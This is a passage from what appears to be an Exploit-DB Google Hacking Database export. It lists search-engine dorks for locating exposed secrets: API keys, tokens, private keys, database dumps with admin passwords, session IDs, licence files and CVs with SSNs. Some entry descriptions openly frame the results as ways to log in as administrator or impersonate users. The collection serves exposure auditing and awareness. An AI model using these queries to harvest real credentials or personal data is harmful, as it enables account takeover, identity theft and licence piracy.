<querystring>https://www.google.com/search?q=intext:&quot;SECRET_KEY&quot; ext|py inurl:mysite -site:stackoverflow.com -site:github.com</querystring>
<edb></edb>
<date>2020-02-17</date>
<author>JadeWolf</author>
</entry>
<entry>
<id>7244</id>
<link>https://www.exploit-db.com/ghdb/7244</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;SECRET_KEY=&quot; site:pastebin.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;SECRET_KEY=&quot; site:pastebin.com
# Files Containing Juicy Info
# Date: 24/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intext:&quot;SECRET_KEY=&quot; site:pastebin.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;SECRET_KEY=&quot; site:pastebin.com</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>418</id>
<link>https://www.exploit-db.com/ghdb/418</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Session Start * * * *:*:* *&quot; filetype:log</shortDescription>
<textualDescription>These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun.</textualDescription>
<query>intext:&quot;Session Start * * * *:*:* *&quot; filetype:log</query>
<querystring>https://www.google.com/search?q=intext:%22Session+Start+*+*+*+*:*:*+*%22+filetype:log&amp;num=100</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4629</id>
<link>https://www.exploit-db.com/ghdb/4629</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Set objConn=Server.CreateObject(&quot;ADODB.Connection&quot;)&quot; ext:asp</shortDescription>
<textualDescription>intext:&quot;Set objConn=Server.CreateObject(&quot;ADODB.Connection&quot;)&quot; ext:asp
Above Dork will show source code of asp file, Most of them contains path to local database.
Thanks
Aamir Rehman
</textualDescription>
<query>intext:&quot;Set objConn=Server.CreateObject(&quot;ADODB.Connection&quot;)&quot; ext:asp</query>
<querystring>https://www.google.com/search?q=intext:&quot;Set objConn=Server.CreateObject(&quot;ADODB.Connection&quot;)&quot; ext:asp</querystring>
<edb></edb>
<date>2017-12-07</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>7992</id>
<link>https://www.exploit-db.com/ghdb/7992</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;sign up&quot; &quot;**&quot; filetype:php</shortDescription>
<textualDescription># Google Dork: intext:&quot;sign up&quot; &quot;**&quot; filetype:php
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;sign up&quot; &quot;**&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=intext:&quot;sign up&quot; &quot;**&quot; filetype:php</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7661</id>
<link>https://www.exploit-db.com/ghdb/7661</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;sitemap&quot; filetype:txt</shortDescription>
<textualDescription># Google Dork: intext:&quot;sitemap&quot; filetype:txt
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intext:&quot;sitemap&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;sitemap&quot; filetype:txt</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>4620</id>
<link>https://www.exploit-db.com/ghdb/4620</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;softperms.txt&quot; ext:TXT</shortDescription>
<textualDescription>When you dork with this,it will generate juicy information that may lead to
parent directory , for best practice filter according to the country .
Regards
Fu2x2000
</textualDescription>
<query>intext:&quot;softperms.txt&quot; ext:TXT</query>
<querystring>https://www.google.com/search?q=intext:&quot;softperms.txt&quot; ext:TXT</querystring>
<edb></edb>
<date>2017-11-27</date>
<author>Fu2x2000</author>
</entry>
<entry>
<id>7880</id>
<link>https://www.exploit-db.com/ghdb/7880</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;SQL&quot; &amp;&amp; &quot;DB&quot; inurl:&quot;/runtime/log/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;SQL&quot; &amp;&amp; &quot;DB&quot; inurl:&quot;/runtime/log/&quot;
# Files containing juicy info.
# Date: 08/12/2021
# Exploit Author: Vitor guaxi</textualDescription>
<query>intext:&quot;SQL&quot; &amp;&amp; &quot;DB&quot; inurl:&quot;/runtime/log/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;SQL&quot; &amp;&amp; &quot;DB&quot; inurl:&quot;/runtime/log/&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Vitor guaxi</author>
</entry>
<entry>
<id>4905</id>
<link>https://www.exploit-db.com/ghdb/4905</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;successfully&quot; intitle:&quot;index of&quot; config | log | logged -stackoverflow</shortDescription>
<textualDescription>Some juicy information.
This can contain successful events of the system like: DB changes, users
actions, file &amp; folder creation, account loggins, etc...
Also very usefull to see what kind of application the system is running.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;successfully&quot; intitle:&quot;index of&quot; config | log | logged -stackoverflow</query>
<querystring>https://www.google.com/search?q=intext:&quot;successfully&quot; intitle:&quot;index of&quot; config | log | logged -stackoverflow</querystring>
<edb></edb>
<date>2018-08-07</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>3783</id>
<link>https://www.exploit-db.com/ghdb/3783</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Thank you for your purchase/trial of ALWIL Software products.:&quot;</shortDescription>
<textualDescription>This dork can fetch you Avast product licenses especially Avast Antiviruses
, including Professional editions ;)
Author: gr00ve_hack3r
www.gr00ve-hack3r.com</textualDescription>
<query>intext:&quot;Thank you for your purchase/trial of ALWIL Software products.:&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Thank you for your purchase/trial of ALWIL Software products.:&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5201</id>
<link>https://www.exploit-db.com/ghdb/5201</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;the WordPress&quot; inurl:wp-config ext:txt</shortDescription>
<textualDescription>*Dork: *
intext:&quot;the WordPress&quot; inurl:wp-config ext:txt
*Description:*
WordPress Configuration files with .txt extension
*Category:*
Files Containing Passwords</textualDescription>
<query>intext:&quot;the WordPress&quot; inurl:wp-config ext:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;the WordPress&quot; inurl:wp-config ext:txt</querystring>
<edb></edb>
<date>2019-05-06</date>
<author>Isaiah Puzon</author>
</entry>
<entry>
<id>195</id>
<link>https://www.exploit-db.com/ghdb/195</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Tobias Oetiker&quot; &quot;traffic analysis&quot;</shortDescription>
<textualDescription>This is the MRTG traffic analysis pages. This page lists information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network.</textualDescription>
<query>intext:&quot;Tobias Oetiker&quot; &quot;traffic analysis&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Tobias+Oetiker%22+%22traffic+analysis%22</querystring>
<edb></edb>
<date>2004-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7924</id>
<link>https://www.exploit-db.com/ghdb/7924</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;token&quot; filetype:log &quot;authenticate&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;token&quot; filetype:log &quot;authenticate&quot;
# Files Containing Juicy Info
# Date: 04/02/2022
# Exploit Author: Priyanka Iyer</textualDescription>
<query>intext:&quot;token&quot; filetype:log &quot;authenticate&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;token&quot; filetype:log &quot;authenticate&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Priyanka Iyer</author>
</entry>
<entry>
<id>6103</id>
<link>https://www.exploit-db.com/ghdb/6103</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;W E L C O M E to R O O T&quot; ext:cfg OR ext:log OR ext:txt</shortDescription>
<textualDescription># Google Dork: intext:&quot;W E L C O M E to R O O T&quot; ext:cfg OR ext:log OR ext:txt
# Juicy and sensitive information.
# Date: 20/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;W E L C O M E to R O O T&quot; ext:cfg OR ext:log OR ext:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;W E L C O M E to R O O T&quot; ext:cfg OR ext:log OR ext:txt</querystring>
<edb></edb>
<date>2020-05-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7267</id>
<link>https://www.exploit-db.com/ghdb/7267</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Welcome to Huawei web page for network configuration.&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Welcome to Huawei web page for network configuration.&quot;
# Files Containing Juicy Info
# Date:31/08/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intext:&quot;Welcome to Huawei web page for network configuration.&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Welcome to Huawei web page for network configuration.&quot;</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8296</id>
<link>https://www.exploit-db.com/ghdb/8296</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;xss&quot; intext:&quot;Unpatched&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;xss&quot; intext:&quot;Unpatched&quot;
# Files Containing Juicy Info
# Date: 31/10/2023
# Exploit Sachin Gupta</textualDescription>
<query>Re: site:www.openbugbounty.org intext:&quot;xss&quot; intext:&quot;Unpatched&quot;</query>
<querystring>https://www.google.com/search?q=Re: site:www.openbugbounty.org intext:&quot;xss&quot; intext:&quot;Unpatched&quot;</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>6868</id>
<link>https://www.exploit-db.com/ghdb/6868</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Your client connection&quot; + &quot;Network name&quot; + &quot;Hardware address&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Your client connection&quot; + &quot;Network name&quot; + &quot;Hardware address&quot;
# Cisco Meraki configuration panels with juicy info...
# Date: 8/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Your client connection&quot; + &quot;Network name&quot; + &quot;Hardware address&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Your client connection&quot; + &quot;Network name&quot; + &quot;Hardware address&quot;</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4737</id>
<link>https://www.exploit-db.com/ghdb/4737</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;[***] Results from&quot; + ext:txt + &quot;snort-&quot;</shortDescription>
<textualDescription>intext:&quot;[***] Results from&quot; + ext:txt + &quot;snort-&quot;
Show interested Snort rules
ManhNho
</textualDescription>
<query>intext:&quot;[***] Results from&quot; + ext:txt + &quot;snort-&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;[***] Results from&quot; + ext:txt + &quot;snort-&quot;</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>ManhNho</author>
</entry>
<entry>
<id>3777</id>
<link>https://www.exploit-db.com/ghdb/3777</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;~~Joomla1.txt&quot; title:&quot;Index of /&quot;</shortDescription>
<textualDescription>intext:&quot;~~Joomla1.txt&quot; title:&quot;Index of /&quot;
Get all server configs files
Discovered by alsa7r</textualDescription>
<query>intext:&quot;~~Joomla1.txt&quot; title:&quot;Index of /&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;~~Joomla1.txt&quot; title:&quot;Index of /&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>377</id>
<link>https://www.exploit-db.com/ghdb/377</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:(password | passcode) intext:(username | userid | user) filetype:csv</shortDescription>
<textualDescription>CSV formatted files containing all sorts of user/password combinations. Results may vary, but are still interesting to the casual attacker..</textualDescription>
<query>intext:(password | passcode) intext:(username | userid | user) filetype:csv</query>
<querystring>https://www.google.com/search?q=intext:(password+%7C+passcode)+intext:(username+%7C+userid+%7C+user)+++filetype:csv&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4638</id>
<link>https://www.exploit-db.com/ghdb/4638</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:----- Begin SAP License ----- ext:txt</shortDescription>
<textualDescription>hope it's hellpful to find sap license files :)
dork: intext:----- Begin SAP License ----- ext:txt
</textualDescription>
<query>intext:----- Begin SAP License ----- ext:txt</query>
<querystring>https://www.google.com/search?q=intext:----- Begin SAP License ----- ext:txt</querystring>
<edb></edb>
<date>2017-12-12</date>
<author>amon k3b</author>
</entry>
<entry>
<id>4052</id>
<link>https://www.exploit-db.com/ghdb/4052</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:/homedir/.cpanel-datastore/</shortDescription>
<textualDescription>intext:/homedir/.cpanel-datastore dork displays publicly accessible and
indexed cpanel datastores.
Enjoy, Zapperlink</textualDescription>
<query>intext:/homedir/.cpanel-datastore/</query>
<querystring>https://www.google.com/search?q=intext:/homedir/.cpanel-datastore/</querystring>
<edb></edb>
<date>2015-08-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>3966</id>
<link>https://www.exploit-db.com/ghdb/3966</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)</shortDescription>
<textualDescription>Looks for text files with SHA1 of &quot;password&quot;. These could be tips (not very useful), config files, other peoples wordlist dumps, etc
</textualDescription>
<query>intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)</query>
<querystring>https://www.google.com/search?q=intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)</querystring>
<edb></edb>
<date>2014-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>6491</id>
<link>https://www.exploit-db.com/ghdb/6491</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:admin ext:sql inurl:admin</shortDescription>
<textualDescription>*Google Dork:* intext:admin ext:sql inurl:admin
*Description:*With the extension sql and intext admin and inurl admin, I
was able to look into some of the admin sql files and even sql queries
directly that reveals lots of sensitive information like login id, password
in clear text. .
*Author:* Anshul T
Thanks,
Anshul T
</textualDescription>
<query>intext:admin ext:sql inurl:admin</query>
<querystring>https://www.google.com/search?q=intext:admin ext:sql inurl:admin</querystring>
<edb></edb>
<date>2020-08-21</date>
<author>Anshul T</author>
</entry>
<entry>
<id>4915</id>
<link>https://www.exploit-db.com/ghdb/4915</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:APIKey ext:js | xml | yml | txt | conf | py -github -stackoverflow intitle:&quot;index of&quot;</shortDescription>
<textualDescription>Dork containing some API Keys from several web applications.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:APIKey ext:js | xml | yml | txt | conf | py -github -stackoverflow intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=intext:APIKey ext:js | xml | yml | txt | conf | py -github -stackoverflow intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2018-08-13</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7348</id>
<link>https://www.exploit-db.com/ghdb/7348</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:api_key filetype:log</shortDescription>
<textualDescription># Google Dork: intext:api_key filetype:log
# Files Containing Juicy Info
# Date:22/09/2021
# Exploit Author: Matheus Bolela</textualDescription>
<query>intext:api_key filetype:log</query>
<querystring>https://www.google.com/search?q=intext:api_key filetype:log</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Matheus Bolela</author>
</entry>
<entry>
<id>7329</id>
<link>https://www.exploit-db.com/ghdb/7329</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:Authorization: Bearer filetype:log</shortDescription>
<textualDescription># Google Dork: intext:Authorization: Bearer filetype:log
# Files Containing Juicy Info
# Date: 22/09/2021
# Exploit Autor: Matheus Bolela
</textualDescription>
<query>intext:Authorization: Bearer filetype:log</query>
<querystring>https://www.google.com/search?q=intext:Authorization: Bearer filetype:log</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Matheus Bolela</author>
</entry>
<entry>
<id>5235</id>
<link>https://www.exploit-db.com/ghdb/5235</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:backup.sql intitle:index.of</shortDescription>
<textualDescription>SQL Backups.
</textualDescription>
<query>intext:backup.sql intitle:index.of</query>
<querystring>https://www.google.com/search?q=intext:backup.sql intitle:index.of</querystring>
<edb></edb>
<date>2019-05-31</date>
<author>Dec0y</author>
</entry>
<entry>
<id>4053</id>
<link>https://www.exploit-db.com/ghdb/4053</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:bbdd index.of &quot;/&quot; &quot;Parent Directory&quot;</shortDescription>
<textualDescription>Databases directory info. Have Fun!
Rootkit.</textualDescription>
<query>intext:bbdd index.of &quot;/&quot; &quot;Parent Directory&quot;</query>
<querystring>https://www.google.com/search?q=intext:bbdd index.of &quot;/&quot; &quot;Parent Directory&quot;</querystring>
<edb></edb>
<date>2015-08-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4864</id>
<link>https://www.exploit-db.com/ghdb/4864</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:cv OR intext:curriculum vitae &quot;passport details&quot; ext:doc -template</shortDescription>
<textualDescription>Find CVs online containing Juicy Information
TheManyHatsClub - admin@crypt.fi - @buydogs
</textualDescription>
<query>intext:cv OR intext:curriculum vitae &quot;passport details&quot; ext:doc -template</query>
<querystring>https://www.google.com/search?q=intext:cv OR intext:curriculum vitae &quot;passport details&quot; ext:doc -template</querystring>
<edb></edb>
<date>2018-06-22</date>
<author>TheManyHatsClub</author>
</entry>
<entry>
<id>6839</id>
<link>https://www.exploit-db.com/ghdb/6839</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:cv OR intext:curriculum vitae AND intext:&quot;SSN&quot; ext:doc</shortDescription>
<textualDescription>intext:cv OR intext:curriculum vitae AND intext:&quot;SSN&quot; ext:doc
# Google Dork: CV and SSN dork
# Date: 18/03/21
# Author: cybersecstu
Stu- Co-FounderTHE MANY HATS CLUB
https://themanyhats.club@themanyhatsclub
@cybersecstu
</textualDescription>
<query>intext:cv OR intext:curriculum vitae AND intext:&quot;SSN&quot; ext:doc</query>
<querystring>https://www.google.com/search?q=intext:cv OR intext:curriculum vitae AND intext:&quot;SSN&quot; ext:doc</querystring>
<edb></edb>
<date>2021-03-19</date>
<author>cybersecstu</author>
</entry>
<entry>
<id>4722</id>
<link>https://www.exploit-db.com/ghdb/4722</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:database inurl:&quot;laravel.log&quot; ext:log</shortDescription>
<textualDescription>Juicy info in Laravel logs giving database names, usernames, php functions
and so on
Bruno Schmid
</textualDescription>
<query>intext:database inurl:&quot;laravel.log&quot; ext:log</query>
<querystring>https://www.google.com/search?q=intext:database inurl:&quot;laravel.log&quot; ext:log</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>3689</id>
<link>https://www.exploit-db.com/ghdb/3689</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:db_pass inurl:settings.ini</shortDescription>
<textualDescription>Submitter: Bastich mysql.nimbit.com dashboard settings</textualDescription>
<query>intext:db_pass inurl:settings.ini</query>
<querystring>https://www.google.com/search?q=intext:db_pass inurl:settings.ini</querystring>
<edb></edb>
<date>2011-02-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>811</id>
<link>https://www.exploit-db.com/ghdb/811</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:gmail invite intext:http://gmail.google.com/gmail/a</shortDescription>
<textualDescription>This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding &quot;+blog&quot;, &quot;+livejournal&quot;, or , &quot;+forum&quot;.</textualDescription>
<query>intext:gmail invite intext:http://gmail.google.com/gmail/a</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intext%3Agmail+invite+intext%3Ahttp%3A%2F%2Fgmail.google.com%2Fgmail%2Fa</querystring>
<edb></edb>
<date>2005-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>6434</id>
<link>https://www.exploit-db.com/ghdb/6434</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:ISUR_MACHINE IIS -log</shortDescription>
<textualDescription>Dork: intext:ISUR_MACHINE IIS -log
Description: Error messages
Author: Priyanka Prasad
</textualDescription>
<query>intext:ISUR_MACHINE IIS -log</query>
<querystring>https://www.google.com/search?q=intext:ISUR_MACHINE IIS -log</querystring>
<edb></edb>
<date>2020-07-23</date>
<author>Priyanka Prasad</author>
</entry>
<entry>
<id>4002</id>
<link>https://www.exploit-db.com/ghdb/4002</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log</shortDescription>
<textualDescription>Google dork to find session IDs and potentially impersonate users:
intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log
Regards,
Gabor Szathmari
</textualDescription>
<query>intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log</query>
<querystring>https://www.google.com/search?q=intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log</querystring>
<edb></edb>
<date>2015-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4969</id>
<link>https://www.exploit-db.com/ghdb/4969</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:Modified files in JOE when it aborted on JOE was aborted because the terminal closed</shortDescription>
<textualDescription>intext:Modified files in JOE when it aborted on JOE was aborted because
the terminal closed
This Google Dork discovers servers exposing possible useful information
hidden in DEADJOE files.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intext:Modified files in JOE when it aborted on JOE was aborted because the terminal closed</query>
<querystring>https://www.google.com/search?q=intext:Modified files in JOE when it aborted on JOE was aborted because the terminal closed</querystring>
<edb></edb>
<date>2018-10-01</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4032</id>
<link>https://www.exploit-db.com/ghdb/4032</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:OLD_FOREIGN_KEY_CHECKS&quot;; = ext:txt</shortDescription>
<textualDescription>Google dork Description: MySQL dumpGoogle search: intext:OLD_FOREIGN_KEY_CHECKS&quot;; = ext:txt
by TN-N3SQU1K :) </textualDescription>
<query>intext:OLD_FOREIGN_KEY_CHECKS&quot;; = ext:txt</query>
<querystring>https://www.google.com/search?q=intext:OLD_FOREIGN_KEY_CHECKS&quot;; = ext:txt</querystring>
<edb></edb>
<date>2015-07-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7662</id>
<link>https://www.exploit-db.com/ghdb/7662</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:pass filetype:txt</shortDescription>
<textualDescription># Google Dork: intext:pass filetype:txt
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intext:pass filetype:txt</query>
<querystring>https://www.google.com/search?q=intext:pass filetype:txt</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>5057</id>
<link>https://www.exploit-db.com/ghdb/5057</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:password &quot;Login Info&quot; filetype:txt</shortDescription>
<textualDescription>Find Username and Password Combo Login Information
intext:password &quot;Login Info&quot; filetype:txt
Discovered By: Kevin Randall
</textualDescription>
<query>intext:password &quot;Login Info&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=intext:password &quot;Login Info&quot; filetype:txt</querystring>
<edb></edb>
<date>2018-12-14</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>8080</id>
<link>https://www.exploit-db.com/ghdb/8080</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:phpMiniAdmin inurl:phpminiadmin ext:php</shortDescription>
<textualDescription># Google Dork: intext:phpMiniAdmin inurl:phpminiadmin ext:php
# Files Containing Juicy Info
# Date:22/02/2023
# Exploit Author: Nullfuzz</textualDescription>
<query>intext:phpMiniAdmin inurl:phpminiadmin ext:php</query>
<querystring>https://www.google.com/search?q=intext:phpMiniAdmin inurl:phpminiadmin ext:php</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>Nullfuzz</author>
</entry>
<entry>
<id>3923</id>
<link>https://www.exploit-db.com/ghdb/3923</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github</shortDescription>
<textualDescription>intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github
How This Work?
This dork will searches databases phpMyAdmin. Searches only sql formats and founds admin username and passwords to use this information to login as administrator
Sorry for my english. I'm not a native speaker
</textualDescription>
<query>intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github</query>
<querystring>https://www.google.com/search?q=intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github</querystring>
<edb></edb>
<date>2013-11-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>8169</id>
<link>https://www.exploit-db.com/ghdb/8169</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:pom.xml intitle:&quot;index of /&quot;</shortDescription>
<textualDescription># Google Dork: intext:pom.xml intitle:&quot;index of /&quot;
# Files Containing Juicy Info
# Date:21/04/2023
# Exploit Author: Sagar Banwa
</textualDescription>
<query>intext:pom.xml intitle:&quot;index of /&quot;</query>
<querystring>https://www.google.com/search?q=intext:pom.xml intitle:&quot;index of /&quot;</querystring>
<edb></edb>
<date>2023-04-21</date>
<author>Sagar Banwa</author>
</entry>
<entry>
<id>7347</id>
<link>https://www.exploit-db.com/ghdb/7347</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:private_key filetype:log</shortDescription>
<textualDescription># Google Dork: intext:private_key filetype:log
# Files Containing Juicy Info
# Date:22/09/2021
# Exploit Author: Matheus Bolela</textualDescription>
<query>intext:private_key filetype:log</query>
<querystring>https://www.google.com/search?q=intext:private_key filetype:log</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Matheus Bolela</author>
</entry>
<entry>
<id>5134</id>
<link>https://www.exploit-db.com/ghdb/5134</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:reports filetype:cache</shortDescription>
<textualDescription>intext:reports filetype:cache
Regards,
Hussain vohra
</textualDescription>
<query>intext:reports filetype:cache</query>
<querystring>https://www.google.com/search?q=intext:reports filetype:cache</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>Hussain Vohra</author>
</entry>
<entry>
<id>4628</id>
<link>https://www.exploit-db.com/ghdb/4628</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:Server.MapPath(&quot;.mdb&quot;) ext:asp</shortDescription>
<textualDescription>Dork: intext:Server.MapPath(&quot;.mdb&quot;) ext:asp
Above Dork will show source code of asp file which contain path to local database. Most of these databases contain Admin/User credentials.
Thanks
Aamir Rehman
</textualDescription>
<query>intext:Server.MapPath(&quot;.mdb&quot;) ext:asp</query>
<querystring>https://www.google.com/search?q=intext:Server.MapPath(&quot;.mdb&quot;) ext:asp</querystring>
<edb></edb>
<date>2017-12-07</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>532</id>
<link>https://www.exploit-db.com/ghdb/532</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:SQLiteManager inurl:main.php</shortDescription>
<textualDescription>sQLiteManager is a tool Web multi-language of management of data bases SQLite. # Management of several data base (Creation, access or upload basic) # Management of the attached bases of donn̮̬es # Creation, modification and removal of tables and index. # Insertion, modification, suppression of recording in these tables</textualDescription>
<query>intext:SQLiteManager inurl:main.php</query>
<querystring>https://www.google.com/search?q=intext%3ASQLiteManager+inurl%3Amain.php&amp;ie=UTF-8</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7503</id>
<link>https://www.exploit-db.com/ghdb/7503</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:swagger filetype:log</shortDescription>
<textualDescription># Google Dork: intext:swagger filetype:log
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: Matheus Bolela</textualDescription>
<query>intext:swagger filetype:log</query>
<querystring>https://www.google.com/search?q=intext:swagger filetype:log</querystring>
<edb></edb>
<date>2021-10-27</date>
<author>Matheus Bolela</author>
</entry>
<entry>
<id>4420</id>
<link>https://www.exploit-db.com/ghdb/4420</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:Table structure for table `wp_users` filetype:sql</shortDescription>
<textualDescription>Google dork : intext:Table structure for table `wp_users` filetype:sql
Description : This google dork can access many website database dump in sql format .
